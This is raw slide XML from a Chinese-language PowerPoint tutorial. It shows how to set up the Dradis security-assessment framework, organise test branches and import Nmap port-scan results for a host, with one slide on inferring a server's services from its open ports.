                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Dradis</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>是一个独立的</a:t>
            </a:r>
            <a:r>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>应用程序。因此</a:t>
            </a:r>
            <a:r>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>它会自动在浏览器中打开</a:t>
            </a:r>
            <a:r>
              <a:t>https://127.0.0.1:3004</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="903" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2151662" y="2417233"/>
            <a:ext cx="8479276" cy="6067543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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05" name="Shape 905"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681566" y="993986"/>
            <a:ext cx="10148712" cy="1677316"/>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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>避免证书错误，然后点击</a:t>
            </a:r>
            <a:r>
              <a:t>“I Understand the Risks”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>按钮来添加一个例外</a:t>
            </a:r>
            <a:r>
              <a:t>Dradis</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>。出现证书错误是因为</a:t>
            </a:r>
            <a:r>
              <a:t>Dradis</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>使用的是自签名证书。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="906" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="6321" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086273" y="3351953"/>
            <a:ext cx="10323045" cy="5794691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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08" name="Shape 908"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091595" y="643627"/>
            <a:ext cx="10148712" cy="1677316"/>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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>下一步是创建一个服务器密码来访问应用程序。点击</a:t>
            </a:r>
            <a:r>
              <a:t>“Back to the app”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>链接访问密码设置页面。输入密码，然后单击</a:t>
            </a:r>
            <a:r>
              <a:t>“Initialize”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>按钮。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="909" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1863" t="51977" r="3840" b="14280"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292075" y="3000022"/>
            <a:ext cx="9130800" cy="1931901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="910" name="Shape 910"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1205653" y="5743786"/>
            <a:ext cx="6678508" cy="6380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defRPr sz="2800">
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>输入我们之前设置的密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="911" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="5393" t="42054" r="4690" b="12303"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935806" y="6537395"/>
            <a:ext cx="8614773" cy="2586416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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13" name="Shape 913"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="872066" y="943186"/>
            <a:ext cx="10148712" cy="1677316"/>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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>我们成功进入了</a:t>
            </a:r>
            <a:r>
              <a:t>Dradis</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>框架。现在我们可以开始使用</a:t>
            </a:r>
            <a:r>
              <a:t>Dradis</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>通过创建一个新的分支。点击</a:t>
            </a:r>
            <a:r>
              <a:t>“add branch”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>按钮，并将它命名为</a:t>
            </a:r>
            <a:r>
              <a:t>“Security Test”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="914" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="6114" r="0" b="9700"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1291673" y="3263899"/>
            <a:ext cx="10055701" cy="5232191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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16" name="Shape 916"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694266" y="727286"/>
            <a:ext cx="10148712" cy="1157683"/>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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>现在，在新创建的分支单击鼠标右键，然后单击</a:t>
            </a:r>
            <a:r>
              <a:t>“add child”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>选项在新创建的分支下添加支行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="917" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="6285" r="0" b="7171"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010073" y="2666717"/>
            <a:ext cx="10802172" cy="5571618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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0" name="Shape 210"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527050" y="412748"/>
            <a:ext cx="3873500" cy="76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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>通过端口判断服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="211" name="image16.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="451687" y="2189571"/>
            <a:ext cx="12101426" cy="5552258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Shape 212"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432592" y="8096250"/>
            <a:ext cx="11326814"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从图中可以看出该服务器搭建了http(Web)、msrpc(文件共享)、MSSQL数据库等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Shape 213"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469899" y="1555750"/>
            <a:ext cx="741680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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>通过扫描服务器开放的端口判断服务器上存在的服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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19" name="Shape 919"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="910166" y="598875"/>
            <a:ext cx="10148712" cy="32129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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>为了方便我们创造了一个树形分支。</a:t>
            </a:r>
            <a:r>
              <a:t>“Security Test”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>划分为三个支线，</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>端口扫描</a:t>
            </a:r>
            <a:r>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>应用程序扫描</a:t>
            </a:r>
            <a:r>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:t>“Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>的漏洞扫描</a:t>
            </a:r>
            <a:r>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>。每个子分支由不同的工具进一步划分。我们可以在每个分行或支行下添加主机。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>例如，我们的</a:t>
            </a:r>
            <a:r>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>文件夹下添加的</a:t>
            </a:r>
            <a:r>
              <a:t>IP 10.48.14.12</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>。我们的目标在这里放置</a:t>
            </a:r>
            <a:r>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:t>10.48.14.12</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>的扫描结果。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="920" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="7003" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2145153" y="4574822"/>
            <a:ext cx="9284449" cy="4531663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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2" name="Shape 922"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011766" y="636975"/>
            <a:ext cx="10148712" cy="1677316"/>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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>点击</a:t>
            </a:r>
            <a:r>
              <a:t>“import file from…”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>按钮，从下拉框中选择</a:t>
            </a:r>
            <a:r>
              <a:t>“NmapUpload”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>，浏览并选择要上传的文件。点击</a:t>
            </a:r>
            <a:r>
              <a:t>“Open”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>按钮，</a:t>
            </a:r>
            <a:r>
              <a:t>Dradis</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>将开始验证和解析该文件。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="923" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="5650" r="16430" b="42588"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2158435" y="3630506"/>
            <a:ext cx="8859232" cy="3016202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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5" name="Shape 925"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="884766" y="789375"/>
            <a:ext cx="10148712" cy="6380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defRPr sz="2800">
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>解析成功后，结果将会被上传。现在可以看到主机开放的端口。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="926" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1728" t="32609" r="3457" b="15019"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1577339" y="1831622"/>
            <a:ext cx="9172646" cy="3114573"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="927" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="2256" t="33992" r="2577" b="10906"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2012711" y="6162886"/>
            <a:ext cx="8979462" cy="3213754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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9" name="Shape 929"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="706966" y="1043375"/>
            <a:ext cx="10148712" cy="6380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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>我们可以通过</a:t>
            </a:r>
            <a:r>
              <a:t>“add note”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>按钮来添加任意端口。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="930" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1863" t="21588" r="3033" b="6948"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1025313" y="2507853"/>
            <a:ext cx="10050380" cy="4737958"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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32" name="Shape 932"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
